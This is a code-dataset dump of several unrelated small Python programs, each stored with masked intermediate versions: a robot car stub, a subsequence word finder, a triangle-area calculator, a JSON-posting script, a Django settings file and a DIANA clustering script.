"step-2": "<mask token>\n\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print('Forward')\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print('Forward')\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\nif __name__ == '__main__':\n rc = RobotCar_Stub()\n rc.move('fblrs')\n",
"step-4": "from robotcar import RobotCar\nimport pdb\n\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print('Forward')\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\nif __name__ == '__main__':\n rc = RobotCar_Stub()\n rc.move('fblrs')\n",
"step-5": "from robotcar import RobotCar\nimport pdb\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print(\"Forward\")\n \n def backward(self):\n print(\"Backward\")\n \n def left(self):\n print(\"Left\")\n \n def right(self):\n print(\"Right\")\n \n def stop(self):\n print(\"Stop\")\n\n\nif __name__ == '__main__':\n rc = RobotCar_Stub()\n rc.move(\"fblrs\")\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
def longest_word(s, d):
lengths = [(entry, len(entry)) for entry in d]
sorted_d = sorted(lengths, key = lambda x: (-x[1], x[0]))
for word, length in sorted_d:
j = 0
for i in range(0, len(s)):
if j < len(word) and word[j] == s[i]:
j += 1
if j == len(word):
return word
return ''
print(longest_word("abpcplea", ["a", "b", "c"]))
print(longest_word("abpcplea", ["ba", "ab", "a", "b"]))
print(longest_word('abpcplea', ["ale","apple","monkey","plea"]))
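# longest_word returns the longest dictionary entry that is a subsequence of s,
# breaking length ties lexicographically; the three calls above print "a", "ab" and "apple".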
|
normal
|
{
"blob_id": "86de5b4a72978e2c49e060eefc513e3ed61272ae",
"index": 4004,
"step-1": "<mask token>\n",
"step-2": "def longest_word(s, d):\n lengths = [(entry, len(entry)) for entry in d]\n sorted_d = sorted(lengths, key=lambda x: (-x[1], x[0]))\n for word, length in sorted_d:\n j = 0\n for i in range(0, len(s)):\n if j < len(word) and word[j] == s[i]:\n j += 1\n if j == len(word):\n return word\n return ''\n\n\n<mask token>\n",
"step-3": "def longest_word(s, d):\n lengths = [(entry, len(entry)) for entry in d]\n sorted_d = sorted(lengths, key=lambda x: (-x[1], x[0]))\n for word, length in sorted_d:\n j = 0\n for i in range(0, len(s)):\n if j < len(word) and word[j] == s[i]:\n j += 1\n if j == len(word):\n return word\n return ''\n\n\nprint(longest_word('abpcplea', ['a', 'b', 'c']))\nprint(longest_word('abpcplea', ['ba', 'ab', 'a', 'b']))\nprint(longest_word('abpcplea', ['ale', 'apple', 'monkey', 'plea']))\n",
"step-4": "def longest_word(s, d):\n lengths = [(entry, len(entry)) for entry in d]\n sorted_d = sorted(lengths, key = lambda x: (-x[1], x[0]))\n\n for word, length in sorted_d:\n j = 0\n for i in range(0, len(s)):\n if j < len(word) and word[j] == s[i]:\n j += 1\n if j == len(word):\n return word\n return ''\n\nprint(longest_word(\"abpcplea\", [\"a\", \"b\", \"c\"]))\nprint(longest_word(\"abpcplea\", [\"ba\", \"ab\", \"a\", \"b\"]))\nprint(longest_word('abpcplea', [\"ale\",\"apple\",\"monkey\",\"plea\"]))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
import json
data = json.load(open("dummy_data/data.json"))
for one in data:
print(one)
r = requests.post("http://localhost:8080/sumari", json=one)
print(r.text)
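# dummy_data/data.json is assumed to be a JSON array of objects, e.g.
# [{"text": "first document ..."}, {"text": "second document ..."}],
# so each element becomes the JSON body of one POST to the /sumari endpoint.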
|
normal
|
{
"blob_id": "8bc40ed4fe1091ecdb40cd55ff9cf53010078823",
"index": 361,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor one in data:\n print(one)\n r = requests.post('http://localhost:8080/sumari', json=one)\n print(r.text)\n",
"step-3": "<mask token>\ndata = json.load(open('dummy_data/data.json'))\nfor one in data:\n print(one)\n r = requests.post('http://localhost:8080/sumari', json=one)\n print(r.text)\n",
"step-4": "import requests\nimport json\ndata = json.load(open('dummy_data/data.json'))\nfor one in data:\n print(one)\n r = requests.post('http://localhost:8080/sumari', json=one)\n print(r.text)\n",
"step-5": "import requests\nimport json\n\ndata = json.load(open(\"dummy_data/data.json\"))\n\nfor one in data:\n print(one)\n r = requests.post(\"http://localhost:8080/sumari\", json=one)\n print(r.text)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Exercise 3 from the Python tutorial Part 1 on:
https://codeandwork.github.io/courses/prep/pythonTutorial1.html
"""
import math
print("Give the length of each side in order to compute the area of a triangle.")
lenA = float(input("Give the length of side A:"))
lenB = float(input("Give the length of side B:"))
lenC = float(input("Give the length of side C:"))
triangleArea = (1/4) * math.sqrt((lenA+lenB+lenC) * (-lenA+lenB+lenC) * (lenA-lenB+lenC) * (lenA+lenB-lenC))
print("The triangle area is:", triangleArea)
|
normal
|
{
"blob_id": "398cb05218a9772a0b62fdfbacc465b26427827d",
"index": 2854,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n 'Give the length of each side in order to compute the area of a triangle.')\n<mask token>\nprint('The triangle area is:', triangleArea)\n",
"step-3": "<mask token>\nprint(\n 'Give the length of each side in order to compute the area of a triangle.')\nlenA = float(input('Give the length of side A:'))\nlenB = float(input('Give the length of side B:'))\nlenC = float(input('Give the length of side C:'))\ntriangleArea = 1 / 4 * math.sqrt((lenA + lenB + lenC) * (-lenA + lenB +\n lenC) * (lenA - lenB + lenC) * (lenA + lenB - lenC))\nprint('The triangle area is:', triangleArea)\n",
"step-4": "<mask token>\nimport math\nprint(\n 'Give the length of each side in order to compute the area of a triangle.')\nlenA = float(input('Give the length of side A:'))\nlenB = float(input('Give the length of side B:'))\nlenC = float(input('Give the length of side C:'))\ntriangleArea = 1 / 4 * math.sqrt((lenA + lenB + lenC) * (-lenA + lenB +\n lenC) * (lenA - lenB + lenC) * (lenA + lenB - lenC))\nprint('The triangle area is:', triangleArea)\n",
"step-5": "\"\"\"\n Exercise 3 from the Python tutorial Part 1 on:\n https://codeandwork.github.io/courses/prep/pythonTutorial1.html\n\"\"\"\n\nimport math\n\nprint(\"Give the length of each side in order to compute the area of a triangle.\")\nlenA = float(input(\"Give the length of side A:\"))\nlenB = float(input(\"Give the length of side B:\"))\nlenC = float(input(\"Give the length of side C:\"))\n\ntriangleArea = (1/4) * math.sqrt((lenA+lenB+lenC) * (-lenA+lenB+lenC) * (lenA-lenB+lenC) * (lenA+lenB-lenC))\n\nprint(\"The triangle area is:\", triangleArea)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
n=int(input().strip())
a=list(input().strip().split(' '))
H=list(input().strip().split(' '))
a = [int(i) for i in a]
m=int(H[0])
hmin=int(H[1])
hmax=int(H[2])
pos=0
found = 0
d=a[-1]-a[0]
if(d==m):
print(a[0])
elif(0<d<m):
for i in range(hmin, hmax+1):
fin1 = a[0]-i+m
if(hmin<=fin1-a[-1]<=hmax or fin1==a[-1]):
print(a[0]-i)
found = 1
break
if(found == 0):
i = 0
while(i<(n-1)):
found = 0
invalid = 0
d = a[i+1]-a[i]
print(a[i], a[i+1], d)
if(d<hmin or d>hmax):
i=i+1
continue
for j in range(i+1, n):
d = a[j]-a[j-1]
print(a[i], a[j], d)
if(d<hmin or d>hmax):
i = j-1
invalid = 1
break
if(a[j]-a[i]>m):
invalid = 1
break
if(a[j]-a[i]==m):
found = 1
invalid = 0
break
if(invalid == 1):
i = i+1
continue
if(found == 1 or (a[-1]-a[i]+hmin<=m and a[-1]-a[i]+hmax>=m)):
print(a[i])
break
i = i+1
if(n == 1):
print(a[0]+hmax-m)
|
normal
|
{
"blob_id": "3da82bcff0a4f91c1245892bc01e9f743ea354a8",
"index": 4484,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif d == m:\n print(a[0])\nelif 0 < d < m:\n for i in range(hmin, hmax + 1):\n fin1 = a[0] - i + m\n if hmin <= fin1 - a[-1] <= hmax or fin1 == a[-1]:\n print(a[0] - i)\n found = 1\n break\nif found == 0:\n i = 0\n while i < n - 1:\n found = 0\n invalid = 0\n d = a[i + 1] - a[i]\n print(a[i], a[i + 1], d)\n if d < hmin or d > hmax:\n i = i + 1\n continue\n for j in range(i + 1, n):\n d = a[j] - a[j - 1]\n print(a[i], a[j], d)\n if d < hmin or d > hmax:\n i = j - 1\n invalid = 1\n break\n if a[j] - a[i] > m:\n invalid = 1\n break\n if a[j] - a[i] == m:\n found = 1\n invalid = 0\n break\n if invalid == 1:\n i = i + 1\n continue\n if found == 1 or a[-1] - a[i] + hmin <= m and a[-1] - a[i] + hmax >= m:\n print(a[i])\n break\n i = i + 1\nif n == 1:\n print(a[0] + hmax - m)\n",
"step-3": "<mask token>\nn = int(input().strip())\na = list(input().strip().split(' '))\nH = list(input().strip().split(' '))\na = [int(i) for i in a]\nm = int(H[0])\nhmin = int(H[1])\nhmax = int(H[2])\npos = 0\nfound = 0\nd = a[-1] - a[0]\nif d == m:\n print(a[0])\nelif 0 < d < m:\n for i in range(hmin, hmax + 1):\n fin1 = a[0] - i + m\n if hmin <= fin1 - a[-1] <= hmax or fin1 == a[-1]:\n print(a[0] - i)\n found = 1\n break\nif found == 0:\n i = 0\n while i < n - 1:\n found = 0\n invalid = 0\n d = a[i + 1] - a[i]\n print(a[i], a[i + 1], d)\n if d < hmin or d > hmax:\n i = i + 1\n continue\n for j in range(i + 1, n):\n d = a[j] - a[j - 1]\n print(a[i], a[j], d)\n if d < hmin or d > hmax:\n i = j - 1\n invalid = 1\n break\n if a[j] - a[i] > m:\n invalid = 1\n break\n if a[j] - a[i] == m:\n found = 1\n invalid = 0\n break\n if invalid == 1:\n i = i + 1\n continue\n if found == 1 or a[-1] - a[i] + hmin <= m and a[-1] - a[i] + hmax >= m:\n print(a[i])\n break\n i = i + 1\nif n == 1:\n print(a[0] + hmax - m)\n",
"step-4": "import sys\nn = int(input().strip())\na = list(input().strip().split(' '))\nH = list(input().strip().split(' '))\na = [int(i) for i in a]\nm = int(H[0])\nhmin = int(H[1])\nhmax = int(H[2])\npos = 0\nfound = 0\nd = a[-1] - a[0]\nif d == m:\n print(a[0])\nelif 0 < d < m:\n for i in range(hmin, hmax + 1):\n fin1 = a[0] - i + m\n if hmin <= fin1 - a[-1] <= hmax or fin1 == a[-1]:\n print(a[0] - i)\n found = 1\n break\nif found == 0:\n i = 0\n while i < n - 1:\n found = 0\n invalid = 0\n d = a[i + 1] - a[i]\n print(a[i], a[i + 1], d)\n if d < hmin or d > hmax:\n i = i + 1\n continue\n for j in range(i + 1, n):\n d = a[j] - a[j - 1]\n print(a[i], a[j], d)\n if d < hmin or d > hmax:\n i = j - 1\n invalid = 1\n break\n if a[j] - a[i] > m:\n invalid = 1\n break\n if a[j] - a[i] == m:\n found = 1\n invalid = 0\n break\n if invalid == 1:\n i = i + 1\n continue\n if found == 1 or a[-1] - a[i] + hmin <= m and a[-1] - a[i] + hmax >= m:\n print(a[i])\n break\n i = i + 1\nif n == 1:\n print(a[0] + hmax - m)\n",
"step-5": "import sys\n\nn=int(input().strip())\na=list(input().strip().split(' '))\nH=list(input().strip().split(' '))\na = [int(i) for i in a]\nm=int(H[0])\nhmin=int(H[1])\nhmax=int(H[2])\npos=0\nfound = 0\nd=a[-1]-a[0]\nif(d==m):\n print(a[0])\nelif(0<d<m):\n for i in range(hmin, hmax+1):\n fin1 = a[0]-i+m\n if(hmin<=fin1-a[-1]<=hmax or fin1==a[-1]):\n print(a[0]-i)\n found = 1\n break\nif(found == 0):\n i = 0 \n while(i<(n-1)):\n found = 0\n invalid = 0\n d = a[i+1]-a[i]\n print(a[i], a[i+1], d)\n if(d<hmin or d>hmax):\n i=i+1\n continue\n for j in range(i+1, n):\n d = a[j]-a[j-1]\n print(a[i], a[j], d)\n if(d<hmin or d>hmax):\n i = j-1\n invalid = 1\n break\n if(a[j]-a[i]>m):\n invalid = 1\n break\n if(a[j]-a[i]==m):\n found = 1\n invalid = 0\n break\n if(invalid == 1):\n i = i+1\n continue\n if(found == 1 or (a[-1]-a[i]+hmin<=m and a[-1]-a[i]+hmax>=m)): \n print(a[i])\n break\n i = i+1\nif(n == 1):\n print(a[0]+hmax-m)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from .base import *
import os
SECRET_KEY = os.environ['SECRET_KEY']
ALLOWED_HOSTS = ['demo.pythonic.nl']
DEBUG = False
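# os.environ['SECRET_KEY'] raises a KeyError when the variable is missing, so the key must be
# provided by the environment before startup, e.g. (illustrative value only):
#   export SECRET_KEY='change-me'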
|
normal
|
{
"blob_id": "e5607d9893b775b216d1790897124a673b190c26",
"index": 2085,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nSECRET_KEY = os.environ['SECRET_KEY']\nALLOWED_HOSTS = ['demo.pythonic.nl']\nDEBUG = False\n",
"step-3": "from .base import *\nimport os\nSECRET_KEY = os.environ['SECRET_KEY']\nALLOWED_HOSTS = ['demo.pythonic.nl']\nDEBUG = False\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#library
import pandas as pd
import numpy as np
import sys
from tqdm import tqdm # show the progress of the run.
import time
from scipy.spatial.distance import pdist, squareform
#0. Data Load
data = pd.read_csv(sys.argv[1], delimiter='\t') # Load train (input text file)
#1. Data Preprocessing
all_elements = [index for index in data.index] # Save index name.
#Make a distance matrix to compute dissimilarity.
distance_matrix = pdist(data, metric='euclidean')
dissimilarity_matrix = np.array(squareform(distance_matrix))
#dissimilarity_matrix = pd.DataFrame(squareform(distance_matrix), columns=all_elements, index=all_elements)
print(dissimilarity_matrix)
#2. Modeling : DIANA Clustering
#2-1. Compute dissimilarity average in ONE Cluster.
def avg_dissim_within_group_element(node, element_list):
max_diameter = -np.inf
sum_dissm = 0 #Set Sum equal zero.
for i in element_list:
sum_dissm += dissimilarity_matrix[node][i] #While iterate element_list, Sum the distance matrix value singly in a node.
if( dissimilarity_matrix[node][i] > max_diameter): #If distance matrix is bigger than max_distance,
max_diameter = dissimilarity_matrix[node][i] # that distance matrix value become a max_diameter.
if(len(element_list)>1):
avg = sum_dissm/(len(element_list)-1) # Average of distance matrix.
else:
avg = 0
return avg
# 2-2. Compute dissimilarity average between different Group(e.g. Cluster1 and Cluster2)
# ids in the separated new group = splinter_list
def avg_dissim_across_group_element(node, main_list, splinter_list):
if len(splinter_list) == 0: #there is no spliter group, return zero.
return 0
sum_dissm = 0
for j in splinter_list:
sum_dissm = sum_dissm + dissimilarity_matrix[node][j] #Compute average between Object in splinter group
avg = sum_dissm/(len(splinter_list)) #and all object dissimilarity matrix.
return avg
# 2-3. Cluster Splinter
def splinter(main_list, splinter_group):
most_dissm_object_value = -np.inf #initate minus.
most_dissm_object_index = None
for node in main_list:
x = avg_dissim_within_group_element(node, main_list) # Previously, a point in main group as a standard.
y = avg_dissim_across_group_element(node, main_list, splinter_group) # a point in the seperated group.
diff = x - y # difference between X and Y
if diff > most_dissm_object_value:
most_dissm_object_value = diff
most_dissm_object_index = node # save index and value which has largest value between two groups.
if(most_dissm_object_value>0): # differnce is Plus, Create new splinter group. flag = 1
return (most_dissm_object_index, 1)
else: # difference is minus, flag = -1
return (-1, -1)
# 2-4. Split
def split(element_list):
main_list = element_list
splinter_group = []
(most_dissm_object_index, flag) = splinter(main_list, splinter_group)
while(flag > 0): # Iterate splinter function until a flag become minus.
main_list.remove(most_dissm_object_index) #Delete the most largest dissimilarity average object index in the main list.
splinter_group.append(most_dissm_object_index) # Then, append in the new splinter group.
(most_dissm_object_index, flag) = splinter(element_list, splinter_group)
return (main_list, splinter_group)
# 2-5. look for maximum distance in the current cluster.
def max_distance(cluster_list):
max_diameter_cluster_index = None
max_diameter_cluster_value = -np.inf
index = 0
for element_list in cluster_list:
for i in element_list: #columns
for j in element_list: #rows
#Switch the largest dissimilarity average object(index), value.
if dissimilarity_matrix[i][j] > max_diameter_cluster_value:
max_diameter_cluster_value = dissimilarity_matrix[i][j]
max_diameter_cluster_index = index
index +=1
if(max_diameter_cluster_value <= 0):
return -1
return max_diameter_cluster_index
# main
if __name__ == '__main__':
# Save arguments list
argv = sys.argv
# Set the number of cluster.
    num_clusters = int(sys.argv[-1])  # argv values are strings; cast so the level check and range() below work.
current_clusters = ([all_elements])
print(current_clusters)
level = 1
index = 0
with tqdm(total=100) as pbar:
        while((index!=-1) and (level!=num_clusters)): #Stop when index becomes -1 or the requested number of clusters is reached.
(a_clstr, b_clstr) = split(current_clusters[index])
del current_clusters[index] # Delete current cluster.
current_clusters.append(a_clstr) #original cluster
current_clusters.append(b_clstr) #splinter cluster
index = max_distance(current_clusters)
level +=1
pbar.update(10)
for i in range(num_clusters): # Save the results.
pd.DataFrame(current_clusters[i], columns=['id']).to_csv("%s_cluster_%d.txt" %(sys.argv[1], i), sep='\t')
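# Illustrative invocation (script and file names are assumptions):
#   python diana.py input_table.tsv 3
# sys.argv[1] is the tab-separated input and the last argument is the desired number of
# clusters; each cluster's row ids are written to "<input>_cluster_<i>.txt".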
|
normal
|
{
"blob_id": "267695555e876dc2fe5820dc194490aad9e5e344",
"index": 1361,
"step-1": "<mask token>\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list:\n for j in element_list:\n if dissimilarity_matrix[i][j] > max_diameter_cluster_value:\n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n index += 1\n if max_diameter_cluster_value <= 0:\n return -1\n return max_diameter_cluster_index\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint(dissimilarity_matrix)\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list:\n for j in element_list:\n if dissimilarity_matrix[i][j] > max_diameter_cluster_value:\n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n index += 1\n if max_diameter_cluster_value <= 0:\n return -1\n return max_diameter_cluster_index\n\n\nif __name__ == '__main__':\n argv = sys.argv\n num_clusters = sys.argv[-1]\n current_clusters = [all_elements]\n print(current_clusters)\n level = 1\n index = 0\n with tqdm(total=100) as pbar:\n while index != -1 and level != num_clusters:\n a_clstr, b_clstr = split(current_clusters[index])\n del current_clusters[index]\n current_clusters.append(a_clstr)\n current_clusters.append(b_clstr)\n index = max_distance(current_clusters)\n level += 1\n pbar.update(10)\n for i in range(num_clusters):\n pd.DataFrame(current_clusters[i], columns=['id']).to_csv(\n '%s_cluster_%d.txt' % (sys.argv[1], i), sep='\\t')\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport sys\nfrom tqdm import tqdm\nimport time\nfrom scipy.spatial.distance import pdist, squareform\ndata = pd.read_csv(sys.argv[1], delimiter='\\t')\nall_elements = [index for index in data.index]\ndistance_matrix = pdist(data, metric='euclidean')\ndissimilarity_matrix = np.array(squareform(distance_matrix))\nprint(dissimilarity_matrix)\n\n\ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0\n for i in element_list:\n sum_dissm += dissimilarity_matrix[node][i]\n if dissimilarity_matrix[node][i] > max_diameter:\n max_diameter = dissimilarity_matrix[node][i]\n if len(element_list) > 1:\n avg = sum_dissm / (len(element_list) - 1)\n else:\n avg = 0\n return avg\n\n\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0:\n return 0\n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j]\n avg = sum_dissm / len(splinter_list)\n return avg\n\n\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list)\n y = avg_dissim_across_group_element(node, main_list, splinter_group)\n diff = x - y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node\n if most_dissm_object_value > 0:\n return most_dissm_object_index, 1\n else:\n return -1, -1\n\n\ndef split(element_list):\n main_list = element_list\n splinter_group = []\n most_dissm_object_index, flag = splinter(main_list, splinter_group)\n while flag > 0:\n main_list.remove(most_dissm_object_index)\n splinter_group.append(most_dissm_object_index)\n most_dissm_object_index, flag = splinter(element_list, splinter_group)\n return main_list, splinter_group\n\n\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list:\n for j in element_list:\n if dissimilarity_matrix[i][j] > max_diameter_cluster_value:\n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n index += 1\n if max_diameter_cluster_value <= 0:\n return -1\n return max_diameter_cluster_index\n\n\nif __name__ == '__main__':\n argv = sys.argv\n num_clusters = sys.argv[-1]\n current_clusters = [all_elements]\n print(current_clusters)\n level = 1\n index = 0\n with tqdm(total=100) as pbar:\n while index != -1 and level != num_clusters:\n a_clstr, b_clstr = split(current_clusters[index])\n del current_clusters[index]\n current_clusters.append(a_clstr)\n current_clusters.append(b_clstr)\n index = max_distance(current_clusters)\n level += 1\n pbar.update(10)\n for i in range(num_clusters):\n pd.DataFrame(current_clusters[i], columns=['id']).to_csv(\n '%s_cluster_%d.txt' % (sys.argv[1], i), sep='\\t')\n",
"step-5": "#library\nimport pandas as pd\nimport numpy as np\nimport sys\n\nfrom tqdm import tqdm # appear the precess of running situation.\nimport time\n\nfrom scipy.spatial.distance import pdist, squareform\n\n#0. Data Load\ndata = pd.read_csv(sys.argv[1], delimiter='\\t') # Load train (input text file)\n\n#1. Data Preprocessing\nall_elements = [index for index in data.index] # Save index name.\n\n#Make a distance metrix to compute dissimilarity.\ndistance_matrix = pdist(data, metric='euclidean')\ndissimilarity_matrix = np.array(squareform(distance_matrix))\n#dissimilarity_matrix = pd.DataFrame(squareform(distance_matrix), columns=all_elements, index=all_elements)\nprint(dissimilarity_matrix)\n\n#2. Modeling : DIANA Clustering\n#2-1. Compute dissimilarity average in ONE Cluster. \ndef avg_dissim_within_group_element(node, element_list):\n max_diameter = -np.inf\n sum_dissm = 0 #Set Sum equal zero.\n for i in element_list: \n sum_dissm += dissimilarity_matrix[node][i] #While iterate element_list, Sum the distance matrix value singly in a node.\n if( dissimilarity_matrix[node][i] > max_diameter): #If distance matrix is bigger than max_distance,\n max_diameter = dissimilarity_matrix[node][i] # that distance matrix value become a max_diameter.\n if(len(element_list)>1):\n avg = sum_dissm/(len(element_list)-1) # Average of distance matrix.\n else: \n avg = 0\n return avg\n\n# 2-2. Compute dissimilarity average between different Group(e.g. Cluster1 and Cluster2) \n# id in sperated new group = splinter_list\ndef avg_dissim_across_group_element(node, main_list, splinter_list):\n if len(splinter_list) == 0: #there is no spliter group, return zero.\n return 0 \n sum_dissm = 0\n for j in splinter_list:\n sum_dissm = sum_dissm + dissimilarity_matrix[node][j] #Compute average between Object in splinter group \n avg = sum_dissm/(len(splinter_list)) #and all object dissimilarity matrix.\n return avg\n\n# 2-3. Cluster Splinter\ndef splinter(main_list, splinter_group):\n most_dissm_object_value = -np.inf #initate minus.\n most_dissm_object_index = None\n for node in main_list:\n x = avg_dissim_within_group_element(node, main_list) # Previously, a point in main group as a standard.\n y = avg_dissim_across_group_element(node, main_list, splinter_group) # a point in the seperated group.\n diff = x - y # difference between X and Y\n if diff > most_dissm_object_value:\n most_dissm_object_value = diff\n most_dissm_object_index = node # save index and value which has largest value between two groups.\n if(most_dissm_object_value>0): # differnce is Plus, Create new splinter group. flag = 1\n return (most_dissm_object_index, 1)\n else: # difference is minus, flag = -1\n return (-1, -1)\n\n# 2-4. Split\ndef split(element_list):\n main_list = element_list\n splinter_group = [] \n (most_dissm_object_index, flag) = splinter(main_list, splinter_group)\n while(flag > 0): # Iterate splinter function until a flag become minus.\n main_list.remove(most_dissm_object_index) #Delete the most largest dissimilarity average object index in the main list.\n splinter_group.append(most_dissm_object_index) # Then, append in the new splinter group.\n (most_dissm_object_index, flag) = splinter(element_list, splinter_group)\n \n return (main_list, splinter_group)\n\n# 2-5. 
look for maximum distance in the current cluster.\ndef max_distance(cluster_list):\n max_diameter_cluster_index = None\n max_diameter_cluster_value = -np.inf\n index = 0\n for element_list in cluster_list:\n for i in element_list: #columns\n for j in element_list: #rows\n #Switch the largest dissimilarity average object(index), value. \n if dissimilarity_matrix[i][j] > max_diameter_cluster_value: \n max_diameter_cluster_value = dissimilarity_matrix[i][j]\n max_diameter_cluster_index = index\n \n index +=1\n \n if(max_diameter_cluster_value <= 0):\n return -1\n \n return max_diameter_cluster_index\n\n# main\nif __name__ == '__main__':\n\n # Save arguments list\n argv = sys.argv \n\n # Set the number of cluster.\n num_clusters = sys.argv[-1]\n current_clusters = ([all_elements])\n print(current_clusters)\n level = 1\n index = 0\n\n with tqdm(total=100) as pbar:\n while((index!=-1) and (level!=num_clusters)): #Proceed until the index equal -1 and setting number of cluster.\n (a_clstr, b_clstr) = split(current_clusters[index])\n del current_clusters[index] # Delete current cluster.\n current_clusters.append(a_clstr) #original cluster\n current_clusters.append(b_clstr) #splinter cluster\n index = max_distance(current_clusters)\n level 